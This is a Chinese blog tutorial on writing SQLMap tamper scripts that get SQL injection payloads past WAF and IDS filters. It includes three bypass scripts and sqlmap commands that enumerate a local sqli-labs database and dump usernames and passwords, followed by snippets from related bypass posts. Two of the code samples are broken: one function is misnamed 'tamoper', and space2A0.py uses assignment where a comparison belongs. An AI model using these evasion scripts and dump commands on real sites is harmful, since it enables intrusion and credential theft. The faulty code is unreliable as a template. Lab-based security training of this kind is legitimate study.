【Python脚本】SQLMap的Tamper脚本——绕过网站自身

已于 2023-10-18 21:57:56 修改
阅读量609 收藏 3
点赞数
文章标签: python 开发语言
于 2023-10-17 23:02:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55205599/article/details/133895159
版权
本文介绍了SQLMap工具及其内置Tamper脚本,用于检测和利用SQL注入漏洞,包括不同类型的注入技术如布尔盲注、时间盲注等。文章还详细讲解了如何编写和使用Tamper脚本来绕过IDS和WAF,以及脚本执行中的各种数据库操作示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、概念

1、SQLMap

实现SQL注入漏洞的检测与利用的自动化处理,其自带的Tamper脚本可以帮助绕过IDS/WAF的检测

2、Tamper脚本

绕过安全防护

3、IDS(入侵检测系统)

深入浅出讲解IDS(入侵检测系统)_ids是什么意思-优快云博客

形象比喻:假如防火墙是一幢大楼的防盗门和安全锁,那么IDS(入侵检测系统)就是这幢大楼里的监视系统。一旦有小偷通过爬窗进入大楼,或者内部人员有越界行为,实时监视系统就会发现情况并发出警告

4、WAF(web应用防火墙)

WAF介绍-优快云博客

是通过执行一系列针对HTTP,HTTPS的安全策略,来专门对web应用,提供保护的一款产品

二、SQL注入技术

1、基于布尔的盲注

能根据页面的返回内容判断真假

2、基于时间的盲注

不能根据页面的返回内容来判断信息,而是使用条件语句查看时间延迟语句是否执行(即页面的返回时间是否增加),以此来判断

3、基于报错的注入

根据页面返回的错误信息来判断,或者把注入语句的结果直接返回到页面中

4、堆查询注入

同时执行多条语句的执行时的注入

三、Tamper结构

难点是如何针对目标网站的防护找出对应的绕过方法

# 导入SQLMap中lib\core\enums中的PRIORITY优先级函数
from lib.core.enums import PRIORITY
# 定义脚本优先级
__priority__ = PRIORITY.LOW

# 对当前脚本的介绍,可以为空
def dependencies():
	pass

'''
对传进来的payload进行修改并返回
函数有两个参数。主要更改的是payload参数,kwargs参数用得不多。
在官方提供的Tamper脚本中只被使用了2次,两次都只是更改了http-header
'''

def tamoper(payload,**kwargs):
	# 增加相关的payload处理,再将payload返回
	# 必须返回最后的payload
	return payload

四、脚本编写

1、双写绕过脚本

double-and-or.py

# 双写绕过脚本
# 导入正则模块,用于字符的替换
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

# 脚本描述函数
def dependencies():
	pass

def tamper(payload,**kwargs):
	# 将payload进行转存
	retVal = payload
	if payload:
		# 使用re.sub函数不区分大小写地替换and 和or
		# 将and和or替换为anandd和oorr
		retVal = re.sub(r"(?i)(or)",r"oorr",retVal)
		retVal = re.sub(r"(?i)(and)", r"anandd", retVal)
	#把最后修改好的payload返回
	return retVal

2、空格替换脚本

space2A0.py

# 空格替换脚本  ---以官方Tamper脚本的space2plus.py为模板进行更改
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

# 脚本描述函数
def dependencies():
	pass

def tamper(payload,**kwargs):
	retVal = payload
	if payload:
		retVal = ""
		quote,doublequote,firstspace = False,False,False
		
		for i in xrange(len(payload)):
			if not firstspace:
				if payload[i].isspace():
					firstspace = True
					# 把原先的 + 改为%a0即可
					retVal += "%a0"
					continue
			elif payload[i] == '\'':
				quote = not quote
				
			elif payload[i] == '"':
				doublequote = not doublequote
			
			elif payload[i] = " " and not doublequote and not quote:
				# 把原先的 + 改为 %a0即可
				retVal += "%a0"
				continue
			retVal += payload[i]
	return retVal

3、count(*)替换为count(1)

count.py

import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW

def dependencies():
	pass

def tamper(payload,**kwargs):
	retVal = payload
	if payload:
		# 把count(*) 替换为count(1)
		retVal = re.sub(r"(?i)count\(\*\)",r"count(1)",payload)
	return retVal

五、脚本执行

1、找注入点

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3" --tamper "double-and-or.py,space2A0.py" -v 3

2、遍历数据库

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -dbs

3、遍历security库里的数据表

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -D “security” --tables

4、遍历security库中users表的字段

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -D “security” -T “users” --columns

5、遍历数据

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py"  -D “security” -T “users” -C “username,password” --dump

此时,没有数据,说明遍历数据库数据的payload还是有问题

payload中的count(*) 出现了关键词*,说明是被过滤了

再写一个脚本把count(*)进行替换,通过count(常数)来代替count(*)

继续遍历数据:

sqlmap -u "http://127.0.0.1/sql/Less-26/?id=3"  -v 3 --tamper "double-and-or.py,space2A0.py,count.py"  -D “security” -T “users” -C “username,password” --dump

sqlmap tamper脚本编写
m0_56578216的博客
09-22 673
SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到绕过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本sqlmap的编写语言也是pythontamper脚本能增强sqlmap的功能,达到绕过检测的目的。
sqlmap 双写关键字绕过 tamper
shadowwolf’s blog
08-30 2835
双写绕过的存在一般都是在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过 但是鉴于手注有些小麻烦,所以还是上sqlmap sqlmap中无双写注入的脚本,所以我编写了一个tamper,可以根据测出的被ban的关键词进行修改: #!/usr/bin/env python ''' sqlmap 双写绕过 by:shadowwolf ''' from lib.core.compat import xrange from lib.core.enums i
Sqlmap 使用tamper脚本绕过waf (一)
Praifire的博客
07-16 1911
脚本类别: apostrophemask.py 作用:用utf8代替引号 equaltolike.py  作用:like 代替等号 greatest.py   作用:绕过过滤’>’ ,用GREATEST替换大于号。 space2dash.py 作用:绕过过滤‘=’ 替换空格字符(”)
SqlMap绕WAF脚本
最新发布
所有文章均免费阅读,大家一起学习
04-25 209
SQLMap 脚本在 SQL 注入攻击中广泛用于绕过 Web 应用防火墙(WAF)。这些脚本通过修改 SQL 负载,使其能够避开 FortiWAF、F5、Barracuda、Akamai、Cloudflare 和 Imperva 等厂商的 WAF 检测。本文将深入介绍各种 SQLMap 脚本绕过技术、它们的工作原理、对 WAF 的有效性以及实际测试场景。
sqlmap 使用tamper脚本绕过WAF
xf3401837266的博客
05-22 1971
sqlmap 使用tamper脚本绕过WAF
tamper绕WAF详解
weixin_34112208的博客
06-16 924
0x00 背景 sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。 0x01 start 脚本名:apostrophem...
进阶的sqlmap用法(参数讲解)
热门推荐
0yst3r ‘s blog
09-21 1万+
进阶的sqlmap用法 参数讲解 1>探测等级: --level 5 --level 5 指的是需要执行的测试等级 一共有5个等级(1-5) 不加 level 时,默认是1 5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。 level=2 http cookie会测试 level=3 http...
SQLMapTamper脚本
m0_62207482的博客
01-31 3675
SQLMap是一款用来检测与利用SQL注入漏洞的免费 开源工具,不仅可以实现SQL注入漏洞的检测与利用的自动化处理,而且其自带 的Tamper脚本可以帮助我们绕过IDS/WAF的检测。虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站 的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个 时候就需要我们针对目标的防护体系手动构建相应的Tamper脚本Tamper脚本的构建非常简单,其实渗透测试中真正的难点在于如何针对目标 网站的防护找出对应的绕过方法。
SQLMAP自带的绕过脚本 --tamper
kuxing100的专栏
05-05 1184
首先这个文章我是转来的  http://www.chuhades.com/post/19590b_4cc51f  确实很实用,就当记录一下吧,方便日后查询。  apostrophemask.py UTF-8编码  Example:  * Input: AND '1'='1'  * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87
Sqlmap Tamper脚本详解:绕过WAF的技巧
"Sqlmap Tamper脚本是用于自动化SQL注入工具Sqlmap的一种扩展,它包含一系列脚本,目的是对原始payload进行修改以规避WAF(Web应用防火墙)的检测。Tamper脚本tamper函数、dependencies函数等组成,分别负责不同的...
SQLMap tamper脚本绕过WAF与渗透测试指南
"SQLMapTamper文档详细介绍了如何使用SQLMaptamper脚本绕过Web应用程序的敏感字符过滤和WAF规则,以便进行渗透测试。文档涵盖了tamper脚本的作用、用法以及针对不同数据库类型的tamper脚本选择。" 在网络安全...
sqlmap绕过过滤的 tamper 脚本分类汇总
10-19
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
ThinkPHPSQL0day:ThinkPHP3.0~3.3 betweenSQL注入的sqlmap Tamper
07-02
5. **sqlmap Tamper模块**:Tampersqlmap的一个关键组件,它提供了一系列预定义的脚本,用于修改请求中的SQL语句,以绕过网站的防御机制。比如,它可以改变参数的顺序、编码格式,或者使用不同的SQL语法来规避过滤...
sqlmap常用绕过脚本
L_lemo004的博客
10-20 1437
使用方法–tamper xxx.py apostrophemask.py用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 between.py分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=” bluec
sqlmaptamper脚本编写
总有人间一两风,填我十万八千梦
07-26 9621
目录 前言 tamper脚本实战 前言 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies():
sqlmap脚本tamper使用
qq_43665434的博客
06-07 9603
很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可能有的朋友还不知道怎样才能最有效的利用tamper脚本。 当然使用脚本之前需要确定的就是系统过滤了哪些关键字,比如单引号、空格、select、union、admin等等。 所以有的时候我们会发现,注入成功了但是dump不出数据,很可能是select被过滤了等等原因。 如何判断使用哪个脚本 最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。 如图: 直接加个单引号
SQLMAP-绕过脚本,混淆脚本
时光凉春衫薄的博客
01-13 2274
sqlmap-tamper 在kali 的储存位置为/usr/share/sqlmap/tamper 当我们对于一些特殊的字符做替换的时候我们可以通过tamper中的脚本进行自动化的更改我们发送的payload 这里举个注入的例子 我们正常的攻击求如下: sqlmap 上普通注入命令如下:sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值